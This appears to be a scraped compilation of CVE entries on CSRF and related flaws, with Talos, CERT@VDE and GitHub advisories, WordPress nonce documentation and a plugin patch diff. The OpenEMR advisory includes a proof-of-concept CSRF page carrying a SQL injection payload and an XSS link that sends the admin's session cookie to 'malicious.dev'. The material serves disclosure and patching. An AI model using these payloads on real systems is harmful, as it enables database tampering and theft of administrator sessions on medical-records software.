Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.

CVE-2020-28653: Read me | OpManager Help

A cross-site request forgery vulnerability exists in the GACL functionality of OpenEMR 5.0.2 and development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce). A specially crafted HTTP request can lead to the execution of arbitrary requests in the context of the victim. An attacker can send an HTTP request to trigger this vulnerability.

**Summary**

A cross-site request forgery vulnerability exists in the GACL functionality of OpenEMR 5.0.2 and development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce). A specially crafted HTTP request can lead to the execution of arbitrary requests in the context of the victim. An attacker can send an HTTP request to trigger this vulnerability.

**Tested Versions**

OpenEMR 5.0.2  
OpenEMR development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce)

**Product URLs**

https://www.open-emr.org/

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-352 - Cross-Site Request Forgery (CSRF)

**Details**

OpenEMR is an open-source medical practice management software, written in PHP, which features electronic medical records, practice management for a medical practice, scheduling and electronic billing.

OpenEMR uses phpGACL for managing a permission system for its users. As shown in TALOS-2020-1179 and TALOS-2020-1177, phpGACL is vulnerable to multiple SQL injection and XSS issues. OpenEMR ships the latest version of phpGACL, together with a small modification at the top of most of its files for adding OpenEMR authentication:

    //First make sure user has access
    require_once("../../interface/globals.php");
    
    use OpenEMR\Common\Acl\AclMain;
    
    //ensure user has proper access
    if (!AclMain::aclCheckCore('admin', 'acl')) {
                echo xlt('ACL Administration Not Authorized');
                exit;
    }
    

This makes sure that the phpGACL interface is only accessible to authorized users.

Normally, OpenEMR employs CSRF protection by using the following pattern in the pages that can be requested directly:

    use OpenEMR\Common\Csrf\CsrfUtils;
    
    if (!CsrfUtils::verifyCsrfToken($_POST["csrf_token_form"])) {
        CsrfUtils::csrfNotVerified();
    }
    

This check however is missing across all the pages defined by phpGACL, making all requests directed to the gacl/ subdirectory vulnerable to cross-site request forgery.

By exploiting this missing CSRF issue together with the vulnerabilities described in TALOS-2020-1179 and TALOS-2020-1177, an attacker could direct an OpenEMR admin to a malicious website that would be able to perform a cross-site request that exploits either a SQL injection or an XSS, leading to stealing OpenEMR administrator credentials and executing arbitrary queries in its underlaying database.

**Exploit Proof of Concept**

The following proof-of-concept assumes that an attacker sets up a server containing a page with the following contents:

    <body><pre id='out'></pre></body>
    <script>
        var http = new XMLHttpRequest();
        var url = 'http://openemr.dev/gacl/admin/edit_group.php?site=default';
        var params = 'action=Submit&parent_id=1234 union select 1,2,sleep(5)&name=1';
        http.open('POST', url, true);
        http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
        http.withCredentials = true;
        http.onreadystatechange = function() {
            if(http.readyState == 4) {
                var elem = document.getElementById('out');
                elem.innerHTML += 'done\n';
            }
        }
        http.send(params);
        var elem = document.getElementById('out');
        elem.innerHTML = 'Waiting... ';
    </script>
    

If an OpenEMR admin is directed to such page, a POST request will be executed towards the OpenEMR instance “openemr.dev”, exploiting one of the SQL injections described in TALOS-2020-1179. This is possible because no CSRF protection is implemented.

Similarly, the XSS issues described in TALOS-2020-1177 can be abused against OpenEMR. These are reproducible by having an OpenERM admin to click on a link like the following:

    http://openemr.dev/gacl/admin/acl_admin.php?action=\"><script>window.location.href="http://malicious.dev/"%2bdocument.cookie</script>
    

This would trigger a request towards “malicious.dev”, stealing the session cookie for the admin session. This exploits both the XSS issue in phpGACL, the missing CSRF check described in the current issue, and also the missing “httpOnly” flag in OpenEMR’s session cookie.

Note however, that while the session stealing would be prevented by simply setting the “httpOnly” flag, OpenEMR deliberately decided to not do so, as we can read from Common/Session/SessionUtil.php:

    <?php
    /**
     * start/destroy session/cookie for OpenEMR or OpenEMR (patient) portal
     *
     * OpenEMR session/cookie strategy:
     *  1. The vital difference between the OpenEMR and OpenEMR (patient) portal session/cookie is the
     *     cookie_httponly setting.
     *     a. For core OpenEMR, need to set cookie_httponly to false, since javascript needs to be able to
     *        access/modify the cookie to support separate logins in OpenEMR. This is important
     *        to support in OpenEMR since the application needs to robustly support access of
     *        separate patients via separate logins by same users. This is done via custom
     *        restore_session() javascript function; session IDs are effectively saved in the
     *        top level browser window.
     *     b. For (patient) portal OpenEMR, setting cookie_httponly to true. Since only one patient will
     *        be logging into the patient portal, can set this to true, which will help to prevent XSS
     *        vulnerabilities.
    

**Timeline**

2020-10-23 - Vendor Disclosure  
2021-01-05 - Vendor Patched  
2021-01-27 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2020-13569: TALOS-2020-1180 || Cisco Talos Intelligence Group

It was possible to execute a ReDoS-type attack inside CKEditor 4 before 4.16 by persuading a victim to paste crafted URL-like text into the editor, and then press Enter or Space (in the Autolink plugin).

CVE-2021-26272: ckeditor4/CHANGES.md at major · ckeditor/ckeditor4

The MediaWiki "Report" extension has a Cross-Site Request Forgery (CSRF) vulnerability. Before fixed version, there was no protection against CSRF checks on Special:Report, so requests to report a revision could be forged. The problem has been fixed in commit f828dc6 by making use of MediaWiki edit tokens.

This repository has been archived by the owner. It is now read-only.

**CSRF vulnerability for reporting revisions**

**Package**

No package listed

**Affected versions**

<f828dc6

**Description**

**Impact**

Before fixed version, there was no protection against CSRF checks on Special:Report, so requests to report a revision could be forged.

**Patches**

The problem has been fixed in commit f828dc6 by making use of MediaWiki edit tokens.

**Workarounds**

Disable the extension or upgrade it. No workarounds.

CVE-2021-21275: Build software better, together

M&M Software fdtCONTAINER Component in versions below 3.5.20304.x and between 3.6 and 3.6.20304.x is vulnerable to deserialization of untrusted data in its project storage.

2021-01-04 14:01 (CET) VDE-2020-038  

**Pepperl+Fuchs: Multiple vulnerabilites in Comtrol IO-Link Master. Affected versions <= 1.5.48**  
Share: Email | Twitter  

**

Published

**

2021-01-04 14:01 (CET)

**

Last update

**

2021-11-11 08:36 (CET)

**Vendor(s)**

Pepperl+Fuchs SE  

**Product(s)**

Article No°

Product Name

Affected Version(s)

IO-Link Master 4-EIP

<= v1.5.48

IO-Link Master 4-PNIO

<= v1.5.48

IO-Link Master 8-EIP

<= v1.5.48

IO-Link Master 8-EIP-L

<= v1.5.48

IO-Link Master 8-PNIO

<= v1.5.48

IO-Link Master 8-PNIO-L

<= v1.5.48

IO-Link Master DR-8-EIP

<= v1.5.48

IO-Link Master DR-8-EIP-P

<= v1.5.48

IO-Link Master DR-8-EIP-T

<= v1.5.48

IO-Link Master DR-8-PNIO

<= v1.5.48

IO-Link Master DR-8-PNIO-P

<= v1.5.48

IO-Link Master DR-8-PNIO-T

<= v1.5.48

**

Summary

**

Several vulnerabilities exist within firmware versions up to and including v1.5.48.

**

Vulnerabilities

**

**Weakness**

Cross-Site Request Forgery (CSRF) (CWE-352)

**Summary**

_Pepperl+Fuchs Comtrol IO-Link Master in Version 1.5.48 and below is prone to a Cross-Site Request Forgery (CSRF) in the web interface._

**Weakness**

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78)

**Summary**

_Pepperl+Fuchs Comtrol IO-Link Master in Version 1.5.48 and below is prone to an authenticated blind OS Command Injection._

**Summary**

_An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and relay) allows a remote attacker to leak ..._

**Summary**

_During key agreement in a TLS handshake using a DH(E) based ciphersuite a malicious server can send a very large prime value to the client. This will cause the client ..._

**Weakness**

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

**Summary**

_Pepperl+Fuchs Comtrol IO-Link Master in Version 1.5.48 and below is prone to an authenticated reflected POST Cross-Site Scripting_

**Summary**

_Pepperl+Fuchs Comtrol IO-Link Master in Version 1.5.48 and below is prone to a NULL Pointer Dereference that leads to a DoS in discoveryd_

**

Impact

**

Pepperl+Fuchs analyzed and identified affected devices.  
Remote attackers may exploit multiple vulnerabilities to get access to the device and  
execute any program and tap information.

**

Solution

**

In order to prevent the exploitation of the reported vulnerabilities, we recommend that the  
affected units be updated with the following three firmware packages:

*   U-Boot bootloader version 1.36 or newer
*   System image version 1.52 or newer
*   Application base version 1.6.11 or newer

Furthermore, it is always recommended to observe the following measures if the affected  
products are connected to public networks:

1.  An external protective measure to be put in place.  
    Traffic from untrusted networks to the device should be blocked by a firewall.  
    Especially traffic targeting the administration webpage.
2.  Device user accounts to be enabled with secure passwords.  
    If non-trusted people/applications have access to the network that the device is connected to, then configuring passwords for all three User Accounts is recommend.

**

Reported by

**

T.Weber (SEC Consult Vulnerability Lab) reported this vulnerability.

CERT@VDE coordinated and provided the CVE IDs.

CVE-2020-12525: VDE-2020-038 | CERT@VDE

Zoho ManageEngine Applications Manager before 14 build 14880 allows an authenticated SQL Injection via a crafted Alarmview request.

CVE-2020-27733: List of bug fixes and feature enhancements

The Elementor Contact Form DB plugin before 1.6 for WordPress allows CSRF via backend admin pages.

CVE-2021-3133: Changeset 2454670 – WordPress Plugin Repository

The site-offline plugin before 1.4.4 for WordPress lacks certain wp_create_nonce and wp_verify_nonce calls, aka CSRF.

**wp\_create\_nonce( string|int $action = \-1 )**

Creates a cryptographic token tied to a specific action, user, user session, and window of time.

**Contents**

*   Parameters
*   Return
*   More Information
*   Source
*   Related
    *   Uses
    *   Used By
*   Changelog
*   User Contributed Notes

**Parameters**

$action

(string|int) (Optional) Scalar value to add context to the nonce.

Default value: -1

Top ↑

**Return**

(string) The token.

Top ↑

**More Information**

The function should be called using the init or any subsequent action hook. Calling it outside of an action hook can lead to problems, see the ticket #14024 for details.

Top ↑

**Source**

File: wp-includes/pluggable.php

	function wp\_create\_nonce( $action = -1 ) {
		$user = wp\_get\_current\_user();
		$uid  = (int) $user->ID;
		if ( ! $uid ) {
			/\*\* This filter is documented in wp-includes/pluggable.php \*/
			$uid = apply\_filters( 'nonce\_user\_logged\_out', $uid, $action );
		}

		$token = wp\_get\_session\_token();
		$i     = wp\_nonce\_tick();

		return substr( wp\_hash( $i . '|' . $action . '|' . $uid . '|' . $token, 'nonce' ), -12, 10 );
	}

Expand full source code Collapse full source code View on Trac View on GitHub

Top ↑

**Changelog**

Changelog

Version

Description

4.0.0

Session tokens were integrated with nonce creation

2.0.3

Introduced.

Top ↑

**User Contributed Notes**

CVE-2020-35773: wp_create_nonce() | Function | WordPress Developer Resources

An authentication bypass vulnerability exists in the Web Manager functionality of Lantronix XPort EDGE 3.0.0.0R11, 3.1.0.0R9, 3.4.0.0R12 and 4.2.0.0R7. A specially crafted HTTP request can cause increased privileges. An attacker can send an HTTP request to trigger this vulnerability.

**Summary**

An authentication bypass vulnerability exists in the Web Manager functionality of Lantronix XPort EDGE 3.0.0.0R11, 3.1.0.0R9, 3.4.0.0R12 and 4.2.0.0R7. A specially crafted HTTP request can cause increased privileges. An attacker can send an HTTP request to trigger this vulnerability.

**Tested Versions**

Lantronix XPort EDGE 3.0.0.0R11  
Lantronix XPort EDGE 3.1.0.0R9  
Lantronix XPort EDGE 3.4.0.0R12  
Lantronix XPort EDGE 4.2.0.0R7  
Lantronix SGX 5150 8.7.0.0R1  
Lantronix SGX 5150 8.9.0.0R4

**Product URLs**

https://www.lantronix.com/products/xport-edge/

**CVSSv3 Score**

4.8 - CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:H/A:N

**CWE**

CWE-352 - Cross-Site Request Forgery (CSRF)

**Details**

The XPort EDGE is a next-generation wired Ethernet gateway for providing secure Ethernet connectivity to serial devices.

A GET request to the XPort EDGE Web Manager application with a valid username and password will cause a session to be set for that user. Any subsequent requests made by the user’s browser will be granted the same privileges as the original authenticated GET request. An attacker could craft a malicious web page that submits a POST request which would allow an attacker to modify configuration data. Some examples of configuration changes that could be made by an attacker include, enabling or disabling services such as telnet, modification of user credentials, and modifying the serial line configuration. This attack could result in denying access to legitimate users, allowing the attacker to further configure the device through the telnet service, or denying access to the serial line data.

**Timeline**

2020-08-10 - Vendor Disclosure  
2020-12-16 - Public Release

Discovered by Kelly Leuschner of Cisco Talos.

CVE-2020-13527: TALOS-2020-1135 || Cisco Talos Intelligence Group

The ultimate-category-excluder plugin before 1.2 for WordPress allows ultimate-category-excluder.php CSRF.

Timestamp:

12/08/2020 12:29:27 PM (20 months ago)

Marios Alexandrou

Message:

Addressed minor vulnerability reported by SCA AppSec.  

Location:

ultimate-category-excluder/trunk

Files:

  

*   readme.txt (1 diff)
*   ultimate-category-excluder.php (3 diffs)

**Legend:**

Unmodified

Added

Removed

*   **ultimate-category-excluder/trunk/readme.txt**
    
    r2364782
    
    r2434070
    
     
    
    32
    
    32
    
    33
    
    33
    
    \== Changelog ==
    
     
    
    34
    
     
    
    35
    
    \= 1.2 =
    
     
    
    36
    
    \* Addressed minor vulnerability reported by SCA AppSec. If concerned, review your UCE category settings to ensure they are set as expected.
    
    34
    
    37
    
    35
    
    38
    
    \= 1.1 =
    
*   **ultimate-category-excluder/trunk/ultimate-category-excluder.php**
    
    r1490271
    
    r2434070
    
     
    
    2
    
    2
    
    /\*
    
    3
    
    3
    
    Plugin Name: Ultimate Category Excluder
    
    4
    
     
    
    Version: 1.1
    
     
    
    4
    
    Version: 1.2
    
    5
    
    5
    
    Plugin URI: http://infolific.com/technology/software-worth-using/ultimate-category-excluder/
    
    6
    
    6
    
    Description: Easily exclude categories from your front page, feeds, archives, and search results.
    
    …
    
    …
    
     
    
    42
    
    42
    
    43
    
    43
    
    function ksuce\_options\_page() {
    
    44
    
     
    
        if( isset( $\_POST\[ 'ksuce' \] ) ) { $message = ksuce\_process(); }
    
     
    
    44
    
        if( isset( $\_POST\[ 'ksuce' \] ) ) {
    
     
    
    45
    
            check\_admin\_referer( 'uce\_form' );
    
     
    
    46
    
            $message = ksuce\_process();
    
     
    
    47
    
        }
    
    45
    
    48
    
        $options = ksuce\_get\_options();
    
    46
    
    49
    
        ?>
    
    …
    
    …
    
     
    
    50
    
    53
    
            <p><?php \_e( 'Use this page to select the categories you wish to exclude and where you would like to exclude them from.', 'UCE' ); ?></p>
    
    51
    
    54
    
            <form action="options-general.php?page=ultimate-category-excluder.php" method="post">
    
     
    
    55
    
            <?php wp\_nonce\_field( 'uce\_form' ); ?>
    
    52
    
    56
    
            <table class="widefat">
    
    53
    
    57
    
            <thead>
    

**Note:** See TracChangeset for help on using the changeset viewer.

Tag

#csrf